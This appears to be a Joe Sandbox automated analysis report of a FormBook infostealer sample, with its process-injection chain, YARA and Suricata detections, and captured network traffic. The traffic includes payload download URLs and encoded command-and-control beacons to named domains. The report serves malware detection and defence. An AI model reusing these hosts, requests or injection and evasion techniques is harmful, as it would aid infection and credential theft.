Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x.exe

Overview

General Information

Sample name:x.exe
Analysis ID:1509400
MD5:ba5ee405d2cc8ef536634c4e8e4bf0cb
SHA1:c91ab3aba77a079926a28cabe247b5e6db3e59fe
SHA256:69d7e14e2d5fc77e347add9b897623a3615e1c9c483f9ef408b59ec44024fe94
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: Suspicious RASdial Activity
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • x.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\x.exe" MD5: BA5EE405D2CC8EF536634C4E8E4BF0CB)
    • aspnet_compiler.exe (PID: 4280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 6056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • crUcuBAsmdG.exe (PID: 5380 cmdline: "C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 5288 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • crUcuBAsmdG.exe (PID: 3260 cmdline: "C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5200 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ee03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16f12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e003:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16112:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: AspNetCompiler Execution
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 6364, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 4280, ProcessName: aspnet_compiler.exe
            Sigma detected: Suspicious RASdial Activity
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe" , ParentImage: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe, ParentProcessId: 5380, ParentProcessName: crUcuBAsmdG.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 5288, ProcessName: rasdial.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T15:43:06.003455+020020196961A Network Trojan was detected192.168.2.84970689.42.218.72443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T15:43:06.003455+020020197142Potentially Bad Traffic192.168.2.84970689.42.218.72443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T15:43:07.565181+020028033053Unknown Traffic192.168.2.84970789.42.218.72443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://epsys.ro/we/bin.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: x.exeReversingLabs: Detection: 21%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: x.exeJoe Sandbox ML: detected
            Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 89.42.218.72:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: x.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: crUcuBAsmdG.exe, 00000005.00000002.3316271241.000000000054E000.00000002.00000001.01000000.00000007.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3316446902.000000000054E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdb source: x.exe
            Source: Binary string: aspnet_compiler.pdb source: rasdial.exe, 00000006.00000002.3316528748.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3319482531.000000000511C000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2177618283.0000000013F4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdbBSJB source: x.exe
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C5BFE0 FindFirstFileW,FindNextFileW,FindClose,6_2_02C5BFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_02C49A00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi6_2_02C4DB8F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_049E04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2019696 - Severity 1 - ET MALWARE Possible MalDoc Payload Download Nov 11 2014 : 192.168.2.8:49706 -> 89.42.218.72:443
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.withad.xyz
            Source: DNS query: www.takitoon.xyz
            Source: global trafficHTTP traffic detected: GET /we/bin.exe HTTP/1.1Host: epsys.roConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /we/DEMONCODER.dll HTTP/1.1Host: epsys.ro
            Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49706 -> 89.42.218.72:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 89.42.218.72:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /we/bin.exe HTTP/1.1Host: epsys.roConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /we/DEMONCODER.dll HTTP/1.1Host: epsys.ro
            Source: global trafficHTTP traffic detected: GET /v35v/?dD=3XyH6pjxGLhPK&7FhphPx8=QLykxYh4zvA0eVm/xmgK7YOftMTq5+WaLw1iNOUTi/NZcFg0+k6SoYLj+BPGFkyr7e2u2NP+bwB2tUbtyEagHZeSqjZTmkHziwyHhfbKN4nr0Mmvp+QBtaJQgZEcDG5b/A== HTTP/1.1Host: www.coffee-and-blends.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /mtee/?7FhphPx8=mIo06BHEAes+1ktUHg9aZX/pKZMQjyZWlUKS3fumHCh/F9Apz5MmN8cCaSJUq7K+1FNCT10frPNoaLR8s0NWGBCBd7fYdbgwZQXT0szxpSzoohttWdsUK9P7gt6l1VyO9A==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.mayawashfold.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /ym8o/?7FhphPx8=0oBut1yNYbWGPCBm9TSA9IgiRO1fme9nbBTx5iLcdFvMwA802wT54clasuFI7VrQYq05SkWGMRfigce42UbKA1ftCWwM+Miq0U3WQ7VDlbB/qS47COTgeoabRThRJ1vWYw==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.zz82x.topAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /sok0/?7FhphPx8=9nK66fHSoCGrYX5jHrC3asY4m/NP2zsti9hRjfn4Wr4e/FiQigglveO7AVfjaLvN/0FhSpqF9UPYZOX+oIaHTDoBLOWSI3eQtwYAcESBlg+HOyGBVY7bHW8qFNWLHXF31w==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.wcm50.topAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /r0nv/?7FhphPx8=MbxsL1z6NlMfyEEeEQCuleq/PSZKqmv+EotLfQicwl73p/l3IQxOAMqhPPjuw+t9DkEIHNdwHFeA2SCmiRgkQNTMDGlrdY5Eo5SgN2XzPpFk5ijgPk/X6R3QnhfZ7UWTpg==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.withad.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /em49/?7FhphPx8=vV5RcTk6UjJnp8cGdrCla/0gYy6e1BMmF8l1hdm9JL6NOoivCUbMAyYanCg5fgzmDPzjWpeb906PoOnUGjRvxfKMvQWnmHyH5PNq1cjGr2lL9E1sX95rHCmr3UDKreGapg==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.lanxuanz.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /2w7y/?dD=3XyH6pjxGLhPK&7FhphPx8=Lawv0YecSOnZdZmp6B7rN+coqY7pSb/9YfPVtq1IvWwToR7xRnuq3CLFfh0Vaxr7O62UC86yvXBBKTgeeftZ3A1ObV/07dRLVO5P4hXPb+DhwEJ5M29tcAJMbTexkiGgNw== HTTP/1.1Host: www.filelabel.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /y13u/?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.comrade.lolAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /484o/?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA== HTTP/1.1Host: www.takitoon.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficDNS traffic detected: DNS query: epsys.ro
            Source: global trafficDNS traffic detected: DNS query: www.coffee-and-blends.info
            Source: global trafficDNS traffic detected: DNS query: www.mayawashfold.net
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.wcm50.top
            Source: global trafficDNS traffic detected: DNS query: www.withad.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global trafficDNS traffic detected: DNS query: www.filelabel.info
            Source: global trafficDNS traffic detected: DNS query: www.comrade.lol
            Source: global trafficDNS traffic detected: DNS query: www.takitoon.xyz
            Source: global trafficDNS traffic detected: DNS query: www.pmjjewels.online
            Source: unknownHTTP traffic detected: POST /mtee/ HTTP/1.1Host: www.mayawashfold.netAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-usOrigin: http://www.mayawashfold.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeReferer: http://www.mayawashfold.net/mtee/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0Data Raw: 37 46 68 70 68 50 78 38 3d 72 4b 41 55 35 31 50 6c 4b 74 6c 6f 37 55 5a 64 47 54 52 7a 4d 32 69 65 43 72 51 61 6f 6e 63 5a 6e 7a 32 6c 36 65 62 6d 4f 56 63 32 62 4d 6f 4b 31 34 6f 42 54 65 42 2b 63 45 4e 44 6b 72 65 4c 31 51 74 50 51 30 4d 77 68 76 56 4c 53 5a 51 4b 76 30 6c 6b 4a 78 71 38 64 74 44 59 51 4a 6f 6a 5a 6e 76 4d 74 63 50 34 74 53 62 43 75 45 6c 41 5a 63 34 65 43 66 33 63 72 64 4b 56 39 47 6a 33 6a 73 7a 61 66 4b 50 79 38 35 7a 37 57 34 53 46 57 58 73 78 2b 72 6f 70 4a 4c 43 6e 65 57 35 35 45 63 6f 76 65 33 54 5a 34 54 74 4a 45 61 33 7a 63 74 71 52 7a 37 63 53 54 50 63 67 53 46 53 37 53 72 57 55 6e 2b 67 3d Data Ascii: 7FhphPx8=rKAU51PlKtlo7UZdGTRzM2ieCrQaoncZnz2l6ebmOVc2bMoK14oBTeB+cENDkreL1QtPQ0MwhvVLSZQKv0lkJxq8dtDYQJojZnvMtcP4tSbCuElAZc4eCf3crdKV9Gj3jszafKPy85z7W4SFWXsx+ropJLCneW55Ecove3TZ4TtJEa3zctqRz7cSTPcgSFS7SrWUn+g=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 11 Sep 2024 13:44:00 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
